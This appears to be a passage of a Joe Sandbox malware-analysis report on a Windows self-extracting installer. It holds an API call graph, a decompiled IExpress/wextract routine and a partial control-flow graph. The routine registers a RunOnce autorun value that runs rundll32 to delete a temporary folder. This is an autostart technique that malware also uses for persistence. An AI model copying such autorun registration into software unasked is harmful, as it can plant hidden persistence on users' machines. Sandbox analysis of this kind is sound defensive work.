3152->3155 3153->3154 3154->3150 3156 e73646 3154->3156 3157 e7359b SetEvent 3155->3157 3159 e7358a SetEvent 3155->3159 3158 e744b9 20 API calls 3156->3158 3160 e73680 4 API calls 3157->3160 3158->3141 3159->3150 3160->3141 3161 e769b0 3162 e769b5 3161->3162 3170 e76fbe GetModuleHandleW 3162->3170 3164 e769c1 __set_app_type __p__fmode __p__commode 3165 e769f9 3164->3165 3166 e76a02 __setusermatherr 3165->3166 3167 e76a0e 3165->3167 3166->3167 3172 e771ef _controlfp 3167->3172 3169 e76a13 3171 e76fcf 3170->3171 3171->3164 3172->3169 3173 e77270 _except_handler4_common 3174 e76c03 3175 e76c17 _exit 3174->3175 3176 e76c1e 3174->3176 3175->3176 3177 e76c27 _cexit 3176->3177 3178 e76c32 3176->3178 3177->3178 3054 e74cc0 GlobalFree 3055 e76f40 SetUnhandledExceptionFilter 3179 e74bc0 3181 e74c05 3179->3181 3182 e74bd7 3179->3182 3180 e74c1b SetFilePointer 3180->3182 3181->3180 3181->3182 3183 e730c0 3184 e730de CallWindowProcA 3183->3184 3185 e730ce 3183->3185 3186 e730da 3184->3186 3185->3184 3185->3186 3187 e763c0 3188 e76407 3187->3188 3189 e7658a CharPrevA 3188->3189 3190 e76415 CreateFileA 3189->3190 3191 e7643a 3190->3191 3192 e76448 WriteFile 3190->3192 3195 e76ce0 4 API calls 3191->3195 3193 e76465 CloseHandle 3192->3193 3193->3191 3196 e7648f 3195->3196 3197 e73100 3198 e731b0 3197->3198 3201 e73111 3197->3201 3199 e73141 3198->3199 3200 e731b9 SendDlgItemMessageA 3198->3200 3200->3199 3202 e7311d 3201->3202 3203 e73149 GetDesktopWindow 3201->3203 3202->3199 3204 e73138 EndDialog 3202->3204 3205 e743d0 11 API calls 3203->3205 3204->3199 3206 e7315d 6 API calls 3205->3206 3206->3199 3207 e74200 3208 e7421e 3207->3208 3209 e7420b SendMessageA 3207->3209 3209->3208 3056 e74cd0 3057 e74cf4 3056->3057 3058 e74d0b 3056->3058 3059 e74d02 3057->3059 3060 e74b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 e74dcb 3058->3062 3065 e74d25 3058->3065 3061 e76ce0 4 API calls 3059->3061 3060->3059 3064 e74e95 3061->3064 3063 e74dd4 SetDlgItemTextA 3062->3063 3066 e74de3 3062->3066 3063->3066 3065->3059 3079 e74c37 3065->3079 3066->3059 3084 e7476d 3066->3084 3070 e74e38 3070->3059 3072 e74980 25 API calls 3070->3072 3071 e74b60 FindCloseChangeNotification 3073 e74d99 SetFileAttributesA 3071->3073 3074 e74e56 3072->3074 3073->3059 3074->3059 3075 e74e64 3074->3075 3093 e747e0 LocalAlloc 3075->3093 3078 e74e6f 3078->3059 3080 e74c88 3079->3080 3081 e74c4c DosDateTimeToFileTime 3079->3081 3080->3059 3080->3071 3081->3080 3082 e74c5e LocalFileTimeToFileTime 3081->3082 3082->3080 3083 e74c70 SetFileTime 3082->3083 3083->3080 3102 e766ae GetFileAttributesA 3084->3102 3086 e7477b 3086->3070 3087 e747cc SetFileAttributesA 3089 e747db 3087->3089 3089->3070 3090 e76517 24 API calls 3091 e747b1 3090->3091 3091->3087 3091->3089 3092 e747c2 3091->3092 3092->3087 3094 e747f6 3093->3094 3095 e7480f LocalAlloc 3093->3095 3096 e744b9 20 API calls 3094->3096 3098 e74831 3095->3098 3101 e7480b 3095->3101 3096->3101 3099 e744b9 20 API calls 3098->3099 3100 e74846 LocalFree 3099->3100 3100->3101 3101->3078 3103 e74777 3102->3103 3103->3086 3103->3087 3103->3090 3104 e74ad0 3112 e73680 3104->3112 3107 e74aee WriteFile 3109 e74b14 3107->3109 3110 e74b0f 3107->3110 3108 e74ae9 3109->3110 3111 e74b3b SendDlgItemMessageA 3109->3111 3111->3110 3113 e73691 MsgWaitForMultipleObjects 3112->3113 3114 e736a9 PeekMessageA 3113->3114 3115 e736e8 3113->3115 3114->3113 3116 e736bc 3114->3116 3115->3107 3115->3108 3116->3113 3116->3115 3117 e736c7 DispatchMessageA 3116->3117 3118 e736d1 PeekMessageA 3116->3118 3117->3118 3118->3116 3210 e74a50 3211 e74a66 3210->3211 3212 e74a9f ReadFile 3210->3212 3213 e74abb 3211->3213 3214 e74a82 memcpy 3211->3214 3212->3213 3214->3213 3215 e73450 3216 e734d3 EndDialog 3215->3216 3217 e7345e 3215->3217 3220 e7346a 3216->3220 3218 e7349a GetDesktopWindow 3217->3218 3223 e73465 3217->3223 3219 e743d0 11 API calls 3218->3219 3221 e734ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3219->3221 3221->3220 3222 e7348c EndDialog 3222->3220 3223->3220 3223->3222 3224 e73210 3225 e73227 3224->3225 3250 e7328e EndDialog 3224->3250 3226 e73235 3225->3226 3227 e733e2 GetDesktopWindow 3225->3227 3230 e73239 3226->3230 3232 e732dd GetDlgItemTextA 3226->3232 3233 e7324c 3226->3233 3229 e743d0 11 API calls 3227->3229 3231 e733f1 SetWindowTextA SendDlgItemMessageA 3229->3231 3231->3230 3234 e7341f GetDlgItem EnableWindow 3231->3234 3237 e73366 3232->3237 3245 e732fc 3232->3245 3235 e732c5 EndDialog 3233->3235 3236 e73251 3233->3236 3234->3230 3235->3230 3236->3230 3238 e7325c LoadStringA 3236->3238 3239 e744b9 20 API calls 3237->3239 3240 e73294 3238->3240 3241 e7327b 3238->3241 3239->3230 3262 e74224 LoadLibraryA 3240->3262 3246 e744b9 20 API calls 3241->3246 3244 e73331 GetFileAttributesA 3248 e7333f 3244->3248 3249 e7337c 3244->3249 3245->3237 3245->3244 3246->3250 3247 e732a5 SetDlgItemTextA 3247->3230 3247->3241 3252 e744b9 20 API calls 3248->3252 3251 e7658a CharPrevA 3249->3251 3250->3230 3253 e7338d 3251->3253 3254 e73351 3252->3254 3255 e758c8 27 API calls 3253->3255 3254->3230 3256 e7335a CreateDirectoryA 3254->3256 3257 e73394 3255->3257 3256->3237 3256->3249 3257->3237 3258 e733a4 3257->3258 3259 e733c7 EndDialog 3258->3259 3260 e7597d 34 API calls 3258->3260 3259->3230 3261 e733c3 3260->3261 3261->3230 3261->3259 3263 e74246 GetProcAddress 3262->3263 3264 e743b2 3262->3264 3265 e743a4 FreeLibrary 3263->3265 3266 e7425d GetProcAddress 3263->3266 3268 e744b9 20 API calls 3264->3268 3265->3264 3266->3265 3267 e74274 GetProcAddress 3266->3267 3267->3265 3270 e7428b 3267->3270 3269 e7329d 3268->3269 3269->3230 3269->3247 3271 e742e1 3270->3271 3272 e74295 GetTempPathA 3270->3272 3276 e74390 FreeLibrary 3271->3276 3273 e742ad 3272->3273 3273->3273 3274 e742b4 CharPrevA 3273->3274 3274->3271 3275 e742d0 CharPrevA 3274->3275 3275->3271 3276->3269

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_00E751E5 51 Function_00E744B9 0->51 52 Function_00E76285 0->52 59 Function_00E7468F 0->59 1 Function_00E71FE1 2 Function_00E74FE0 21 Function_00E74EFD 2->21 2->51 2->59 3 Function_00E747E0 3->51 55 Function_00E71680 3->55 4 Function_00E731E0 5 Function_00E76CE0 19 Function_00E76CF0 5->19 6 Function_00E724E0 6->5 61 Function_00E7658A 6->61 7 Function_00E719E0 7->5 34 Function_00E743D0 7->34 8 Function_00E73FEF 8->5 8->51 8->52 119 Function_00E7411B 8->119 9 Function_00E771EF 10 Function_00E76BEF 11 Function_00E736EE 11->5 15 Function_00E728E8 11->15 28 Function_00E767C9 11->28 11->51 62 Function_00E72A89 11->62 115 Function_00E7681F 11->115 12 Function_00E717EE 12->5 13 Function_00E770EB 14 Function_00E71AE8 14->5 30 Function_00E766C8 14->30 45 Function_00E72AAC 14->45 48 Function_00E716B3 14->48 14->51 53 Function_00E71A84 14->53 54 Function_00E71781 14->54 14->55 14->61 117 Function_00E7171E 14->117 15->62 80 Function_00E72773 15->80 16 Function_00E765E8 17 Function_00E76EF0 18 Function_00E734F0 18->34 18->51 57 Function_00E73680 18->57 20 Function_00E770FE 21->5 56 Function_00E74980 21->56 74 Function_00E74B60 21->74 22 Function_00E72BFB 46 Function_00E72CAA 22->46 47 Function_00E752B6 22->47 66 Function_00E71F90 22->66 118 Function_00E72F1D 22->118 23 Function_00E766F9 24 Function_00E74CC0 25 Function_00E74BC0 26 Function_00E730C0 27 Function_00E763C0 27->5 27->54 27->61 64 Function_00E76793 28->64 29 Function_00E717C8 88 Function_00E76648 30->88 31 Function_00E758C8 31->51 31->52 31->55 31->61 32 Function_00E74CD0 32->3 32->5 32->56 68 Function_00E74E99 32->68 32->74 78 Function_00E7476D 32->78 100 Function_00E74C37 32->100 105 Function_00E74702 32->105 33 Function_00E74AD0 33->57 34->5 35 Function_00E71EA7 77 Function_00E7256D 35->77 36 Function_00E76FA5 87 Function_00E7724D 36->87 37 Function_00E718A3 37->5 37->12 38 Function_00E73BA2 38->5 38->8 38->14 38->51 38->52 38->54 38->59 63 Function_00E76495 38->63 71 Function_00E72267 38->71 98 Function_00E7202A 38->98 39 Function_00E772A2 40 Function_00E753A1 40->5 40->55 40->61 40->117 41 Function_00E76FA1 42 Function_00E755A0 42->5 42->51 42->52 42->54 42->59 42->61 70 Function_00E75467 42->70 84 Function_00E7597D 42->84 91 Function_00E76952 42->91 101 Function_00E72630 42->101 112 Function_00E76517 42->112 43 Function_00E74CA0 44 Function_00E766AE 45->5 45->16 45->29 45->55 46->5 46->11 46->37 46->51 46->59 65 Function_00E72390 46->65 67 Function_00E75C9E 46->67 46->112 47->1 47->5 47->16 47->54 47->65 48->54 49 Function_00E769B0 49->9 50 Function_00E76FBE 49->50 82 Function_00E76C70 49->82 108 Function_00E77000 49->108 90 Function_00E76F54 50->90 51->5 51->28 51->55 51->115 51->117 83 Function_00E7667F 53->83 55->54 56->51 85 Function_00E7487A 56->85 58 Function_00E76380 60 Function_00E7268B 60->5 60->51 60->117 61->48 63->5 63->54 63->61 65->5 65->48 65->55 65->61 65->65 66->5 66->35 66->51 67->4 67->5 67->30 67->51 67->55 67->61 67->83 99 Function_00E76E2A 67->99 111 Function_00E75C17 67->111 68->55 69 Function_00E76298 69->5 69->117 70->5 70->31 70->40 70->52 70->54 70->55 70->61 70->84 71->5 71->61 71->117 72 Function_00E75164 72->51 72->59 72->69 73 Function_00E77060 96 Function_00E77120 73->96 113 Function_00E77010 73->113 75 Function_00E76760 76 Function_00E76A60 76->22 76->73 76->87 89 Function_00E77155 76->89 103 Function_00E76C3F 76->103 110 Function_00E77208 76->110 77->6 78->44 78->112 79 Function_00E74169 79->51 79->59 80->5 80->54 80->55 80->61 81 Function_00E77270 83->88 84->5 84->51 84->52 84->60 109 Function_00E7490C 85->109 86 Function_00E76F40 90->87 90->110 92 Function_00E74A50 93 Function_00E73450 93->34 94 Function_00E73B26 94->2 94->69 94->112 95 Function_00E74224 95->51 95->55 97 Function_00E76A20 98->5 98->51 98->61 98->117 99->19 101->5 101->51 102 Function_00E73A3F 102->51 102->52 102->59 102->112 104 Function_00E76C03 104->87 105->48 105->55 106 Function_00E73100 106->34 107 Function_00E74200 112->51 114 Function_00E73210 114->31 114->34 114->51 114->61 114->84 114->95 115->5 115->23 116 Function_00E7621E 116->5 116->51 116->52 116->84 118->0 118->5 118->38 118->42 118->51 118->52 118->61 118->72 118->77 118->79 118->94 118->102 118->116 119->35

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E7202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E00E76CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00E7171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E00E7658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe79a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xe791e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe791e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0xe78580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      							E00E7171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E00E7658A( &_v268, 0x104, 0xe71140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0xe78530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00e7202a
                                                                                                                                                                                                      0x00e72035
                                                                                                                                                                                                      0x00e7203c
                                                                                                                                                                                                      0x00e72041
                                                                                                                                                                                                      0x00e72050
                                                                                                                                                                                                      0x00e7205f
                                                                                                                                                                                                      0x00e72064
                                                                                                                                                                                                      0x00e7206f
                                                                                                                                                                                                      0x00e7208c
                                                                                                                                                                                                      0x00e72094
                                                                                                                                                                                                      0x00e72257
                                                                                                                                                                                                      0x00e72266
                                                                                                                                                                                                      0x00e72266
                                                                                                                                                                                                      0x00e7209a
                                                                                                                                                                                                      0x00e7209b
                                                                                                                                                                                                      0x00e7209d
                                                                                                                                                                                                      0x00e720aa
                                                                                                                                                                                                      0x00e720af
                                                                                                                                                                                                      0x00e720c9
                                                                                                                                                                                                      0x00e720d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e720d3
                                                                                                                                                                                                      0x00e720da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e720da
                                                                                                                                                                                                      0x00e720e2
                                                                                                                                                                                                      0x00e72103
                                                                                                                                                                                                      0x00e7210e
                                                                                                                                                                                                      0x00e72116
                                                                                                                                                                                                      0x00e72122
                                                                                                                                                                                                      0x00e72128
                                                                                                                                                                                                      0x00e7212c
                                                                                                                                                                                                      0x00e72179
                                                                                                                                                                                                      0x00e72194
                                                                                                                                                                                                      0x00e721de
                                                                                                                                                                                                      0x00e721e4
                                                                                                                                                                                                      0x00e72256
                                                                                                                                                                                                      0x00e72256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72256
                                                                                                                                                                                                      0x00e72196
                                                                                                                                                                                                      0x00e72196
                                                                                                                                                                                                      0x00e7219c
                                                                                                                                                                                                      0x00e7219f
                                                                                                                                                                                                      0x00e7219f
                                                                                                                                                                                                      0x00e721a1
                                                                                                                                                                                                      0x00e721a2
                                                                                                                                                                                                      0x00e721a6
                                                                                                                                                                                                      0x00e721a8
                                                                                                                                                                                                      0x00e721b0
                                                                                                                                                                                                      0x00e721b0
                                                                                                                                                                                                      0x00e721b2
                                                                                                                                                                                                      0x00e721b3
                                                                                                                                                                                                      0x00e721bc
                                                                                                                                                                                                      0x00e721c7
                                                                                                                                                                                                      0x00e721cb
                                                                                                                                                                                                      0x00e721f1
                                                                                                                                                                                                      0x00e721f6
                                                                                                                                                                                                      0x00e721fd
                                                                                                                                                                                                      0x00e721ff
                                                                                                                                                                                                      0x00e721ff
                                                                                                                                                                                                      0x00e72204
                                                                                                                                                                                                      0x00e72213
                                                                                                                                                                                                      0x00e72218
                                                                                                                                                                                                      0x00e7221d
                                                                                                                                                                                                      0x00e7221d
                                                                                                                                                                                                      0x00e72220
                                                                                                                                                                                                      0x00e72220
                                                                                                                                                                                                      0x00e72222
                                                                                                                                                                                                      0x00e72223
                                                                                                                                                                                                      0x00e72229
                                                                                                                                                                                                      0x00e7223d
                                                                                                                                                                                                      0x00e72249
                                                                                                                                                                                                      0x00e72250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72250
                                                                                                                                                                                                      0x00e721d2
                                                                                                                                                                                                      0x00e721d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e721d9
                                                                                                                                                                                                      0x00e7213a
                                                                                                                                                                                                      0x00e72141
                                                                                                                                                                                                      0x00e72144
                                                                                                                                                                                                      0x00e7214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72163
                                                                                                                                                                                                      0x00e72172
                                                                                                                                                                                                      0x00e72172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72163
                                                                                                                                                                                                      0x00e720ea
                                                                                                                                                                                                      0x00e720f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72050
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E7205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00E7208C
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E720C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E720EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00E72134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E7215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E7218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E721C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E721E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00E7223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E72250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 178549006-1709460465
                                                                                                                                                                                                      • Opcode ID: 31cc90447172295668017fd6e375b20487f84435f61522bcba517c51f5cfe708
                                                                                                                                                                                                      • Instruction ID: d33b024d653f3664c3ed34da820367d345574646bf54d920466c195dc2d03c08
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31cc90447172295668017fd6e375b20487f84435f61522bcba517c51f5cfe708
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72511471A41214AFDB20DB25DC4DFFA776CEB90704F0491A8FA4DF6191EA708E898B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 36 e73ba2-e73bd9 37 e73bfd-e73bff 36->37 38 e73bdb-e73bee call e7468f 36->38 40 e73c03-e73c28 memset 37->40 44 e73bf4-e73bf7 38->44 45 e73d13-e73d30 call e744b9 38->45 42 e73d35-e73d48 call e71781 40->42 43 e73c2e-e73c40 call e7468f 40->43 49 e73d4d-e73d52 42->49 43->45 54 e73c46-e73c49 43->54 44->37 44->45 56 e73f4d 45->56 52 e73d54-e73d6c call e7468f 49->52 53 e73d9e-e73db6 call e71ae8 49->53 52->45 69 e73d6e-e73d75 52->69 53->56 67 e73dbc-e73dc2 53->67 54->45 58 e73c4f-e73c56 54->58 60 e73f4f-e73f63 call e76ce0 56->60 62 e73c60-e73c65 58->62 63 e73c58-e73c5e 58->63 65 e73c67-e73c6d 62->65 66 e73c75-e73c7c 62->66 64 e73c6e-e73c73 63->64 70 e73c87-e73c89 64->70 65->64 66->70 73 e73c7e-e73c82 66->73 71 e73de6-e73de8 67->71 72 e73dc4-e73dce 67->72 75 e73d7b-e73d98 CompareStringA 69->75 76 e73fda-e73fe1 69->76 70->49 78 e73c8f-e73c98 70->78 79 e73dee-e73df5 71->79 80 e73f0b-e73f15 call e73fef 71->80 72->71 77 e73dd0-e73dd7 72->77 73->70 75->53 75->76 81 e73fe3 call e72267 76->81 82 e73fe8-e73fea 76->82 77->71 84 e73dd9-e73ddb 77->84 85 e73cf1-e73cf3 78->85 86 e73c9a-e73c9c 78->86 87 e73fab-e73fd2 call e744b9 LocalFree 79->87 88 e73dfb-e73dfd 79->88 91 e73f1a-e73f1c 80->91 81->82 82->60 84->79 92 e73ddd-e73de1 call e7202a 84->92 85->53 90 e73cf9-e73d11 call e7468f 85->90 94 e73ca5-e73ca7 86->94 95 e73c9e-e73ca3 86->95 87->56 88->80 96 e73e03-e73e0a 88->96 90->45 90->49 98 e73f46-e73f47 LocalFree 91->98 99 e73f1e-e73f2d LocalFree 91->99 92->71 94->56 103 e73cad 94->103 102 e73cb2-e73cc5 call e7468f 95->102 96->80 104 e73e10-e73e19 call e76495 96->104 98->56 106 e73fd7-e73fd9 99->106 107 e73f33-e73f3b 99->107 102->45 112 e73cc7-e73ce8 CompareStringA 102->112 103->102 113 e73f92-e73fa9 call e744b9 104->113 114 e73e1f-e73e36 GetProcAddress 104->114 106->76 107->40 112->85 118 e73cea-e73ced 112->118 125 e73f7c-e73f90 LocalFree call e76285 113->125 115 e73f64-e73f76 call e744b9 FreeLibrary 114->115 116 e73e3c-e73e80 114->116 115->125 119 e73e82-e73e87 116->119 120 e73e8b-e73e94 116->120 118->85 119->120 123 e73e96-e73e9b 120->123 124 e73e9f-e73ea2 120->124 123->124 128 e73ea4-e73ea9 124->128 